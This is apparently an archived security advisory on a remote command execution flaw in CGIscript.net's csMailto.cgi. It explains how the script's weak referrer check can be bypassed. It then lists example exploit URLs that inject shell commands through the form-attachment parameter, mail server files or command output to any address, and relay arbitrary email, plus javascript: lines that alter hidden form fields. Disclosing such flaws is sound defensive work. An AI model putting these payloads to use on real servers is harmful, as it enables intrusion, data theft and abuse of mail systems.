COMMAND
	CGIscript.net's csMailto.cgi remote command execution
SYSTEMS AFFECTED
	??
PROBLEM
	In Steve Gustin [[email protected]] advisory :
	Because the script stored all the  form  configuration  data  in  hidden
	fields in the actual form, once a user can  bypass  the  referrer  check
	they can essentially do anything an administrator of the  program  could
	do, plus some additional things that probably weren't intended.
	The script doesn't even check for the full referrer, it only checks  for
	the presence of the server hostname  in  the  referral  your  send.  For
	example,            if             the             script             is
	http://host.com/cgi-script/CSMailto/CSMailto.cgi then it will  look  for
	"host.com" in the referer.
	This method is inherently insecure and can be bypassed by:
	- Creating a perl LWP script which could specify an arbitrary referrer.
	- Using javascript or other means to  modify  the  form  values  on  the
	generated CSMailto form and allowing the browser to  send  the  original
	(and valid) URL as a referrer.
	- Creating a local form page with the target hostname in  the  path  and
	thus the referrer that is sent  when  in  the  form  is  submitted  (eg:
	C:\html\host.com\form.html)
	- Creating a local html page with a simple  link  (see  below)  and  the
	target hostname in the path and thus in the referrer that is  sent  when
	the link is clicked (eg: C:\html\host.com.html)
	Some example exploits are as follows. Note, these all  assume  that  the
	referrer check was bypassed with one of the above methods.
	- execute commands on server
	
	CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
	
	- execute command on server and mail output to anyone
	
	CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|[email protected]&form-autoresponse=YES&command=mailform
	
	- email server file to anyone
	
	[email protected]&form-autoresponse=YES&command=mailform
	
	- download/access form input (no referer check)
	CSMailto has the option to "have the feedback exported  to  an  external
	file". These files are stored in CSV format and can be downloaded  from:
	
	CSMailto/export/FORM_NAME.csv
	
	Form HTML  files  are  often  named  after  their  form  names  and  the
	information is also stored in hidden fields in the actual form  like  so
	"...formname=FORM_NAME...". Also, it's  worth  noting  that  the  script
	doesn't properly escape '"', ',', or nextline ("\n") chars, so  any  CSV
	data with those characters may get corrupted.
	- use form to send email to anyone
	
	[email protected][email protected]&form-subject=subject&form-results=body&command=mailform
	
	Another example of the seriousness of this problem, as mentioned  above,
	you can simply load an existing CSMailto form and have your browser  (IE
	in this example) change some of the preset hidden form values  and  then
	click submit. Example:
	- email server file to anyone
	
	javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
	javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
	javascript:alert(document.forms[0]["Email"].value="[email protected]");
	
SOLUTION
	None yet.